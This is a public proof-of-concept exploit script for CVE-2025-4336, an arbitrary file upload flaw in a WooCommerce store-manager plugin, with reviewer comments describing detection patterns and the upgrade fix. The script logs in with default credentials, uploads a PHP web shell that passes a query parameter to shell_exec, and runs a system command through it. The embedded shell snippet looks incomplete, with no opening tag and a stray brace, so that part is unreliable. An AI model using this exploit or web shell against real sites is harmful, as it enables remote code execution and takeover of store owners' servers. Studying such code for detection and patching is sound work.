# Exploit Title: eMagicOne Store Manager for WooCommerce <= 1.2.5 - Arbitrary File Upload via set_file Task
# Date: 05/03/2025
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage: https://emagicone.com
# Version: <= 1.2.5
# Tested on: 1.2.5
# CVE : CVE-2025-4336
#
# NOTE(review): public proof of concept for CVE-2025-4336. Read from the defender's
# side, the three requests below are the traffic a vulnerable site accepts, and so the
# shape a WAF rule, access-log search or IDS signature should match on:
#   - POST ?connector=bridge with form fields "hash" and "task"
#   - POST ?connector=bridge&task=delete_file&key=...&path=... carrying a multipart
#     "file" part whose filename ends in .php
#   - a subsequent GET for /shell.php?cmd=...
# Mitigation per the header is upgrading the plugin past 1.2.5; the default
# credentials the script assumes ("1"/"1") should never be left in place.

import time
import urllib3
import hashlib
import argparse
import requests


def main():
    """Run the proof of concept against the ``victim_url`` given on the command line.

    Steps, as the code below shows:
      1. POST ``?connector=bridge`` with ``task=get_version`` and ``hash`` set to
         MD5(username + password); read ``session_key`` from the JSON reply.
      2. POST a multipart ``file`` part to ``?connector=bridge&task=delete_file``
         with ``key=<session_key>`` and ``path=./test.txt``.
      3. GET ``/shell.php?cmd=ip addr`` and print the body.

    Calls ``exit(1)`` when the reply to step 1 is not JSON or carries no
    ``session_key``. Network errors from ``requests`` are not caught.
    """
    # Suppress the warning that verify=False (below) would otherwise emit per request.
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    ENTITY_TYPE = "."  # assigned but never read anywhere in this function

    # Parse command line arguments
    parser = argparse.ArgumentParser(description="CVE-2025-4336: An exploit...")
    parser.add_argument("victim_url", help="Target url or ip address.")
    parser.add_argument("--username", default="1", help="Username for authentication (default: 1)")
    parser.add_argument("--password", default="1", help="Password for authentication (default: 1)")
    args = parser.parse_args()

    # The bridge authenticates with an unsalted MD5 of username concatenated with
    # password. With the default "1"/"1" this is a fixed value, which makes it a
    # cheap detection indicator in request logs.
    hash_val = hashlib.md5((args.username + args.password).encode()).hexdigest()

    session = requests.Session()
    headers = {
        # Browser-like UA only; nothing below depends on it.
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    }

    # Step 1: obtain a session key. Note verify=False disables TLS certificate
    # validation for this and every later request.
    print("[*] Requesting session key...")
    resp = session.post(
        f"{args.victim_url}/?connector=bridge",
        data={
            "hash": hash_val,
            "task": "get_version"
        },
        headers=headers,
        verify=False
    )
    print("[*] Raw response:", resp.text)

    try:
        # Broad except: any non-JSON reply (HTML error page, empty body) ends here.
        session_key = resp.json().get("session_key")
    except Exception:
        print("[-] Failed to parse session key from response:", resp.text)
        exit(1)

    if not session_key:
        print("[-] No session key returned!")
        exit(1)

    print("[+] Got session key:", session_key)
    time.sleep(2)  # fixed pause between the key request and the upload; reason not stated on the page

    # Step 2: the upload goes to the "delete_file" task (despite the title's
    # "set_file") with the session key and a ./test.txt path in the query string;
    # the file itself travels as a multipart part. The mismatch between the query
    # path and the uploaded filename is part of what to look for in logs.
    upload_url = (
        f"{args.victim_url}/?connector=bridge"
        f"&task=delete_file"
        f"&key={session_key}"
        f"&path=./test.txt"
    )

    # Uploaded content: a PHP snippet that passes the "cmd" query parameter to
    # shell_exec. Declared content type is text/plain, filename is shell.php —
    # a filename/content-type mismatch that upload filters should reject.
    shell_content = b"\".shell_exec($_GET[\"cmd\"]).\"\";\n"
    shell_content += b"}\n"
    shell_content += b"?>\r\n"

    files = {
        "file": ("shell.php", shell_content, "text/plain")
    }

    print("[*] Uploading file...")
    resp = session.post(upload_url, files=files, headers=headers, verify=False)
    print("[*] Upload response:", resp.text)

    # Step 3: the script presumes the bridge wrote the part to the web root as
    # /shell.php — this is inferred from the GET below, not verified by the code.
    # Uses the module-level requests.get, not the session, so no cookies are sent.
    print("[*] Executing Web Shell Commands...")
    r = requests.get(f"{args.victim_url}/shell.php?cmd=ip addr", verify=False)
    print(r.text)


if __name__ == "__main__":
    main()